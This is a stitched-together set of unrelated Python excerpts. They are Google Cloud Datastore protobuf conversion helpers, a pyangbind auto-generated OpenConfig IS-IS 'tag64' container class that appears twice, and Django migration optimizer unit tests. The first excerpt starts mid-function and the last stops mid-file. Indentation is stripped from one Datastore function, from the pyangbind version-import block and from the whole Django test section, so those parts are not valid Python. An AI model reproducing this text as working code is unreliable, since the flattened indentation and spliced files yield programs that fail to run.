        value_pb.meaning = meaning
def entity_to_protobuf(entity):
    """Convert an entity into its protobuf representation.

    :type entity: :class:`google.cloud.datastore.entity.Entity`
    :param entity: The entity to be turned into a protobuf.

    :rtype: :class:`.entity_pb2.Entity`
    :returns: The protobuf representing the entity.
    """
    entity_pb = entity_pb2.Entity()
    if entity.key is not None:
        entity_pb.key.CopyFrom(entity.key.to_protobuf())

    for name, value in entity.items():
        is_list = isinstance(value, list)
        value_pb = _new_value_pb(entity_pb, name)
        # Store the value itself.
        _set_protobuf_value(value_pb, value)
        # Mirror the entity's index exclusions onto the protobuf.  For
        # lists the exclusion flag lives on each sub-value instead of on
        # the array value itself.
        if name in entity.exclude_from_indexes:
            if not is_list:
                value_pb.exclude_from_indexes = True
            for sub_value_pb in value_pb.array_value.values:
                sub_value_pb.exclude_from_indexes = True
        # Restore any meaning metadata captured when the entity was read.
        _set_pb_meaning_from_entity(entity, name, value, value_pb,
                                    is_list=is_list)

    return entity_pb
def get_read_options(eventual, transaction_id):
    """Validate rules for read options, and assign to the request.

    Helper method for ``lookup()`` and ``run_query``.

    :type eventual: bool
    :param eventual: Flag indicating if ``EVENTUAL`` or ``STRONG``
                     consistency should be used.

    :type transaction_id: bytes
    :param transaction_id: A transaction identifier (may be null).

    :rtype: :class:`.datastore_pb2.ReadOptions`
    :returns: The read options corresponding to the inputs.
    :raises: :class:`ValueError` if ``eventual`` is ``True`` and the
             ``transaction_id`` is not ``None``.
    """
    # Inside a transaction, eventual consistency is not allowed.
    if transaction_id is not None:
        if eventual:
            raise ValueError('eventual must be False when in a transaction')
        return datastore_pb2.ReadOptions(transaction=transaction_id)

    if eventual:
        return datastore_pb2.ReadOptions(
            read_consistency=datastore_pb2.ReadOptions.EVENTUAL)
    return datastore_pb2.ReadOptions()
def key_from_protobuf(pb):
    """Factory method for creating a key based on a protobuf.

    The protobuf should be one returned from the Cloud Datastore
    Protobuf API.

    :type pb: :class:`.entity_pb2.Key`
    :param pb: The Protobuf representing the key.

    :rtype: :class:`google.cloud.datastore.key.Key`
    :returns: a new `Key` instance
    """
    path_args = []
    for element in pb.path:
        path_args.append(element.kind)
        # Proto3 scalar fields have no presence bit, so test truthiness;
        # the API only ever sets one of ``id`` / ``name``.
        if element.id:  # Simple field (int64)
            path_args.append(element.id)
        if element.name:  # Simple field (string)
            path_args.append(element.name)

    partition = pb.partition_id
    # Empty strings (proto3 defaults) are normalized to ``None``.
    project = partition.project_id or None
    namespace = partition.namespace_id or None

    return Key(*path_args, namespace=namespace, project=project)
def _pb_attr_value(val):
    """Given a value, return the protobuf attribute name and proper value.

    The Protobuf API uses different attribute names based on value types
    rather than inferring the type.  This function determines the proper
    attribute name for the type of the value provided and returns both
    the attribute name and a properly formatted value.

    Certain value types need to be coerced into a different type (such
    as a `datetime.datetime` into an integer timestamp, or a
    `google.cloud.datastore.key.Key` into a Protobuf representation.  This
    function handles that for you.

    .. note::
       Values which are "text" ('unicode' in Python2, 'str' in Python3) map
       to 'string_value' in the datastore; values which are "bytes"
       ('str' in Python2, 'bytes' in Python3) map to 'blob_value'.

    For example:

    >>> _pb_attr_value(1234)
    ('integer_value', 1234)
    >>> _pb_attr_value('my_string')
    ('string_value', 'my_string')

    :type val:
        :class:`datetime.datetime`, :class:`google.cloud.datastore.key.Key`,
        bool, float, integer, bytes, str, unicode,
        :class:`google.cloud.datastore.entity.Entity`, dict, list,
        :class:`google.cloud.datastore.helpers.GeoPoint`, NoneType
    :param val: The value to be scrutinized.

    :rtype: tuple
    :returns: A tuple of the attribute name and proper value type.
    """
    # NOTE: this ladder is order-sensitive -- ``bool`` must be tested
    # before the integer types (bool subclasses int) and ``Entity``
    # before ``dict`` (Entity subclasses dict).
    if isinstance(val, datetime.datetime):
        return 'timestamp_value', _datetime_to_pb_timestamp(val)
    if isinstance(val, Key):
        return 'key_value', val.to_protobuf()
    if isinstance(val, bool):
        return 'boolean_value', val
    if isinstance(val, float):
        return 'double_value', val
    if isinstance(val, six.integer_types):
        return 'integer_value', val
    if isinstance(val, six.text_type):
        return 'string_value', val
    if isinstance(val, six.binary_type):
        return 'blob_value', val
    if isinstance(val, Entity):
        return 'entity_value', val
    if isinstance(val, dict):
        # Plain dicts become key-less entities.
        entity_val = Entity(key=None)
        entity_val.update(val)
        return 'entity_value', entity_val
    if isinstance(val, list):
        return 'array_value', val
    if isinstance(val, GeoPoint):
        return 'geo_point_value', val.to_protobuf()
    if val is None:
        return 'null_value', struct_pb2.NULL_VALUE

    raise ValueError('Unknown protobuf attr type', type(val))
def _get_value_from_value_pb(value_pb):
"""Given a protobuf for a Value, get the correct value.
The Cloud Datastore Protobuf API returns a Property Protobuf which
has one value set and the rest blank. This function retrieves the
the one value provided.
Some work is done to coerce the return value into a more useful type
(particularly in the case of a timestamp value, or a key value).
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The Value Protobuf.
:rtype: object
:returns: The value provided by the Protobuf.
:raises: :class:`ValueError <exceptions.ValueError>` if no value type
has been set.
"""
value_type = value_pb.WhichOneof('value_type')
if value_type == 'timestamp_value':
result = _pb_timestamp_to_datetime(value_pb.timestamp_value)
elif value_type == 'key_value':
result = key_from_protobuf(value_pb.key_value)
elif value_type == 'boolean_value':
result = value_pb.boolean_value
elif value_type == 'double_value':
result = value_pb.double_value
elif value_type == 'integer_value':
result = value_pb.integer_value
elif value_type == 'string_value':
result = value_pb.string_value
elif value_type == 'blob_value':
result = value_pb.blob_value
elif value_type == 'entity_value':
result = entity_from_protobuf(value_pb.entity_value)
elif value_type == 'array_value':
result = [_get_value_from_value_pb(value)
for value in value_pb.array_value.values]
elif value_type == 'geo_point_value':
result = GeoPoint(value_pb.geo_point_value.latitude,
value_pb.geo_point_value.longitude)
elif value_type == 'null_value':
result = None
else:
raise ValueError('Value protobuf did not have any value set')
return result
def _set_protobuf_value(value_pb, val):
    """Assign 'val' to the correct subfield of 'value_pb'.

    The Protobuf API uses different attribute names based on value types
    rather than inferring the type.

    Some value types (entities, keys, lists) cannot be directly
    assigned; this function handles them correctly.

    :type value_pb: :class:`.entity_pb2.Value`
    :param value_pb: The value protobuf to which the value is being assigned.

    :type val: :class:`datetime.datetime`, boolean, float, integer, string,
               :class:`google.cloud.datastore.key.Key`,
               :class:`google.cloud.datastore.entity.Entity`
    :param val: The value to be assigned.
    """
    attr, val = _pb_attr_value(val)
    if attr == 'entity_value':
        # Entities must be converted to protobuf before assignment.
        value_pb.entity_value.CopyFrom(entity_to_protobuf(val))
    elif attr in ('key_value', 'timestamp_value', 'geo_point_value'):
        # These are already message types; copy them into place.
        getattr(value_pb, attr).CopyFrom(val)
    elif attr == 'array_value':
        if val:
            values_pb = value_pb.array_value.values
            for item in val:
                _set_protobuf_value(values_pb.add(), item)
        else:
            # Force an (empty) array_value field to be set.
            value_pb.array_value.CopyFrom(entity_pb2.ArrayValue(values=[]))
    else:  # scalar, just assign
        setattr(value_pb, attr, val)
class GeoPoint(object):
    """Simple container for a geo point value.

    :type latitude: float
    :param latitude: Latitude of a point.

    :type longitude: float
    :param longitude: Longitude of a point.
    """

    def __init__(self, latitude, longitude):
        self.latitude = latitude
        self.longitude = longitude

    def to_protobuf(self):
        """Convert the current object to protobuf.

        :rtype: :class:`google.type.latlng_pb2.LatLng`.
        :returns: The current point as a protobuf.
        """
        return latlng_pb2.LatLng(latitude=self.latitude,
                                 longitude=self.longitude)

    def __eq__(self, other):
        """Compare two geo points for equality.

        :rtype: bool
        :returns: True if the points compare equal, else False.
        """
        if not isinstance(other, GeoPoint):
            return NotImplemented
        # Coordinate-pair comparison keeps the two attribute checks atomic.
        return ((self.latitude, self.longitude) ==
                (other.latitude, other.longitude))

    def __ne__(self, other):
        """Compare two geo points for inequality.

        :rtype: bool
        :returns: False if the points compare equal, else True.
        """
        return not self == other
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
class tag64(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-ipv6-reachability/prefixes/prefix/subTLVs/subTLVs/tag64. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.
    YANG Description: This container defines sub-TLV 2.
    """

    # __slots__ avoids a per-instance __dict__; "__state" is name-mangled
    # (to "_tag64__state") consistently with the attribute assignments below.
    __slots__ = ("_path_helper", "_extmethods", "__state")
    _yang_name = "tag64"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        # Auto-generated constructor: builds the default child container,
        # then (optionally) copies changed elements from a single source
        # object passed positionally.
        self._path_helper = False
        self._extmethods = False
        # Default, empty "state" child container (config: false).
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )
        load = kwargs.pop("load", None)
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            # The source object must expose every pyangbind element.
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            # Copy only elements that were actually changed on the source.
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Prefer the parent's path when attached to a tree; otherwise fall
        # back to this container's absolute schema path.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "protocols",
                "protocol",
                "isis",
                "levels",
                "level",
                "link-state-database",
                "lsp",
                "tlvs",
                "tlv",
                "mt-ipv6-reachability",
                "prefixes",
                "prefix",
                "subTLVs",
                "subTLVs",
                "tag64",
            ]

    def _get_state(self):
        """
        Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
        YANG Description: State parameters of sub-TLV 2.
        """
        return self.__state

    def _set_state(self, v, load=False):
        """
        Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_state is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_state() directly.
        YANG Description: State parameters of sub-TLV 2.
        """
        # Unwrap values that carry their underlying type.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=state.state,
                is_container="container",
                yang_name="state",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """state must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
                }
            )
        self.__state = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_state(self):
        # Reset "state" back to a fresh default container.
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )

    # Read-only property (config: false): only the getter is exposed.
    state = __builtin__.property(_get_state)

    _pyangbind_elements = OrderedDict([("state", state)])
from . import state
class tag64(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-ipv6-reachability/prefixes/prefix/subTLVs/subTLVs/tag64. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.
    YANG Description: This container defines sub-TLV 2.
    """

    # __slots__ avoids a per-instance __dict__; "__state" is name-mangled
    # (to "_tag64__state") consistently with the attribute assignments below.
    __slots__ = ("_path_helper", "_extmethods", "__state")
    _yang_name = "tag64"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        # Auto-generated constructor: builds the default child container,
        # then (optionally) copies changed elements from a single source
        # object passed positionally.
        self._path_helper = False
        self._extmethods = False
        # Default, empty "state" child container (config: false).
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )
        load = kwargs.pop("load", None)
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            # The source object must expose every pyangbind element.
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            # Copy only elements that were actually changed on the source.
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Prefer the parent's path when attached to a tree; otherwise fall
        # back to this container's absolute schema path.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "protocols",
                "protocol",
                "isis",
                "levels",
                "level",
                "link-state-database",
                "lsp",
                "tlvs",
                "tlv",
                "mt-ipv6-reachability",
                "prefixes",
                "prefix",
                "subTLVs",
                "subTLVs",
                "tag64",
            ]

    def _get_state(self):
        """
        Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
        YANG Description: State parameters of sub-TLV 2.
        """
        return self.__state

    def _set_state(self, v, load=False):
        """
        Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_ipv6_reachability/prefixes/prefix/subTLVs/subTLVs/tag64/state (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_state is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_state() directly.
        YANG Description: State parameters of sub-TLV 2.
        """
        # Unwrap values that carry their underlying type.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=state.state,
                is_container="container",
                yang_name="state",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """state must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
                }
            )
        self.__state = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_state(self):
        # Reset "state" back to a fresh default container.
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )

    # Read-only property (config: false): only the getter is exposed.
    state = __builtin__.property(_get_state)

    _pyangbind_elements = OrderedDict([("state", state)])
| |
from django.db import migrations, models
from django.db.migrations import operations
from django.db.migrations.optimizer import MigrationOptimizer
from django.test import SimpleTestCase
from .models import EmptyManager, UnicodeModel
class OptimizerTests(SimpleTestCase):
"""
Tests the migration autodetector.
"""
def optimize(self, operations, app_label):
"""
Handy shortcut for getting results + number of loops
"""
optimizer = MigrationOptimizer()
return optimizer.optimize(operations, app_label), optimizer._iterations
def assertOptimizesTo(self, operations, expected, exact=None, less_than=None, app_label=None):
result, iterations = self.optimize(operations, app_label)
result = [repr(f.deconstruct()) for f in result]
expected = [repr(f.deconstruct()) for f in expected]
self.assertEqual(expected, result)
if exact is not None and iterations != exact:
raise self.failureException(
"Optimization did not take exactly %s iterations (it took %s)" % (exact, iterations)
)
if less_than is not None and iterations >= less_than:
raise self.failureException(
"Optimization did not take less than %s iterations (it took %s)" % (less_than, iterations)
)
def assertDoesNotOptimize(self, operations, **kwargs):
self.assertOptimizesTo(operations, operations, **kwargs)
def test_single(self):
"""
The optimizer does nothing on a single operation,
and that it does it in just one pass.
"""
self.assertOptimizesTo(
[migrations.DeleteModel("Foo")],
[migrations.DeleteModel("Foo")],
exact=1,
)
def test_create_delete_model(self):
"""
CreateModel and DeleteModel should collapse into nothing.
"""
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.DeleteModel("Foo"),
],
[],
)
def test_create_rename_model(self):
"""
CreateModel should absorb RenameModels.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.RenameModel("Foo", "Bar"),
],
[
migrations.CreateModel(
"Bar",
[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
)
],
)
def test_rename_model_self(self):
"""
RenameModels should absorb themselves.
"""
self.assertOptimizesTo(
[
migrations.RenameModel("Foo", "Baa"),
migrations.RenameModel("Baa", "Bar"),
],
[
migrations.RenameModel("Foo", "Bar"),
],
)
def test_create_alter_model_options(self):
self.assertOptimizesTo(
[
migrations.CreateModel('Foo', fields=[]),
migrations.AlterModelOptions(name='Foo', options={'verbose_name_plural': 'Foozes'}),
],
[
migrations.CreateModel('Foo', fields=[], options={'verbose_name_plural': 'Foozes'}),
]
)
def _test_create_alter_foo_delete_model(self, alter_foo):
"""
CreateModel, AlterModelTable, AlterUniqueTogether/AlterIndexTogether/
AlterOrderWithRespectTo, and DeleteModel should collapse into nothing.
"""
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.AlterModelTable("Foo", "woohoo"),
alter_foo,
migrations.DeleteModel("Foo"),
],
[],
)
def test_create_alter_unique_delete_model(self):
self._test_create_alter_foo_delete_model(migrations.AlterUniqueTogether("Foo", [["a", "b"]]))
def test_create_alter_index_delete_model(self):
self._test_create_alter_foo_delete_model(migrations.AlterIndexTogether("Foo", [["a", "b"]]))
def test_create_alter_owrt_delete_model(self):
self._test_create_alter_foo_delete_model(migrations.AlterOrderWithRespectTo("Foo", "a"))
def _test_alter_alter_model(self, alter_foo, alter_bar):
"""
Two AlterUniqueTogether/AlterIndexTogether/AlterOrderWithRespectTo
should collapse into the second.
"""
self.assertOptimizesTo(
[
alter_foo,
alter_bar,
],
[
alter_bar,
],
)
def test_alter_alter_table_model(self):
self._test_alter_alter_model(
migrations.AlterModelTable("Foo", "a"),
migrations.AlterModelTable("Foo", "b"),
)
def test_alter_alter_unique_model(self):
self._test_alter_alter_model(
migrations.AlterUniqueTogether("Foo", [["a", "b"]]),
migrations.AlterUniqueTogether("Foo", [["a", "c"]]),
)
def test_alter_alter_index_model(self):
self._test_alter_alter_model(
migrations.AlterIndexTogether("Foo", [["a", "b"]]),
migrations.AlterIndexTogether("Foo", [["a", "c"]]),
)
def test_alter_alter_owrt_model(self):
self._test_alter_alter_model(
migrations.AlterOrderWithRespectTo("Foo", "a"),
migrations.AlterOrderWithRespectTo("Foo", "b"),
)
def test_optimize_through_create(self):
"""
We should be able to optimize away create/delete through a create or delete
of a different model, but only if the create operation does not mention the model
at all.
"""
# These should work
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
migrations.DeleteModel("Foo"),
],
[
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
migrations.DeleteModel("Bar"),
migrations.DeleteModel("Foo"),
],
[],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
migrations.DeleteModel("Foo"),
migrations.DeleteModel("Bar"),
],
[],
)
# This should not work - FK should block it
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
migrations.DeleteModel("Foo"),
],
)
# The same operations should be optimized if app_label is specified and
# a FK references a model from the other app.
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
migrations.DeleteModel("Foo"),
],
[
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
],
app_label="otherapp",
)
# But it shouldn't work if a FK references a model with the same
# app_label.
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
migrations.DeleteModel("Foo"),
],
app_label="testapp",
)
# This should not work - bases should block it
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
migrations.DeleteModel("Foo"),
],
)
# The same operations should be optimized if app_label and none of
# bases belong to that app.
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
migrations.DeleteModel("Foo"),
],
[
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
],
app_label="otherapp",
)
# But it shouldn't work if some of bases belongs to the specified app.
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
migrations.DeleteModel("Foo"),
],
app_label="testapp",
)
def test_create_model_add_field(self):
"""
AddField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.AddField("Foo", "age", models.IntegerField()),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.CharField(max_length=255)),
("age", models.IntegerField()),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_create_model_add_field_not_through_fk(self):
"""
AddField should NOT optimize into CreateModel if it's an FK to a model
that's between them.
"""
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Link", [("url", models.TextField())]),
migrations.AddField("Foo", "link", models.ForeignKey("migrations.Link", models.CASCADE)),
],
)
def test_create_model_add_field_not_through_m2m_through(self):
"""
AddField should NOT optimize into CreateModel if it's an M2M using a
through that's created between them.
"""
# Note: The middle model is not actually a valid through model,
# but that doesn't matter, as we never render it.
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("LinkThrough", []),
migrations.AddField(
"Foo", "link", models.ManyToManyField("migrations.Link", through="migrations.LinkThrough")
),
],
)
def test_create_model_alter_field(self):
"""
AlterField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.AlterField("Foo", "name", models.IntegerField()),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.IntegerField()),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_create_model_rename_field(self):
"""
RenameField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.RenameField("Foo", "name", "title"),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("title", models.CharField(max_length=255)),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_add_field_rename_field(self):
"""
RenameField should optimize into AddField
"""
self.assertOptimizesTo(
[
migrations.AddField("Foo", "name", models.CharField(max_length=255)),
migrations.RenameField("Foo", "name", "title"),
],
[
migrations.AddField("Foo", "title", models.CharField(max_length=255)),
],
)
def test_alter_field_rename_field(self):
"""
RenameField should optimize to the other side of AlterField,
and into itself.
"""
self.assertOptimizesTo(
[
migrations.AlterField("Foo", "name", models.CharField(max_length=255)),
migrations.RenameField("Foo", "name", "title"),
migrations.RenameField("Foo", "title", "nom"),
],
[
migrations.RenameField("Foo", "name", "nom"),
migrations.AlterField("Foo", "nom", models.CharField(max_length=255)),
],
)
def test_create_model_remove_field(self):
"""
RemoveField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.CharField(max_length=255)),
("age", models.IntegerField()),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.RemoveField("Foo", "age"),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.CharField(max_length=255)),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_add_field_alter_field(self):
"""
AlterField should optimize into AddField.
"""
self.assertOptimizesTo(
[
migrations.AddField("Foo", "age", models.IntegerField()),
migrations.AlterField("Foo", "age", models.FloatField(default=2.4)),
],
[
migrations.AddField("Foo", name="age", field=models.FloatField(default=2.4)),
],
)
def test_add_field_delete_field(self):
"""
RemoveField should cancel AddField
"""
self.assertOptimizesTo(
[
migrations.AddField("Foo", "age", models.IntegerField()),
migrations.RemoveField("Foo", "age"),
],
[],
)
def test_alter_field_delete_field(self):
"""
RemoveField should absorb AlterField
"""
self.assertOptimizesTo(
[
migrations.AlterField("Foo", "age", models.IntegerField()),
migrations.RemoveField("Foo", "age"),
],
[
migrations.RemoveField("Foo", "age"),
],
)
def _test_create_alter_foo_field(self, alter):
"""
CreateModel, AlterFooTogether/AlterOrderWithRespectTo followed by an
add/alter/rename field should optimize to CreateModel and the Alter*
"""
# AddField
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.AddField("Foo", "c", models.IntegerField()),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
],
)
# AlterField
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.AlterField("Foo", "b", models.CharField(max_length=255)),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
migrations.AlterField("Foo", "c", models.CharField(max_length=255)),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.CharField(max_length=255)),
]),
alter,
],
)
# RenameField
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "b", "c"),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "b", "x"),
migrations.RenameField("Foo", "x", "c"),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "b", "c"),
],
)
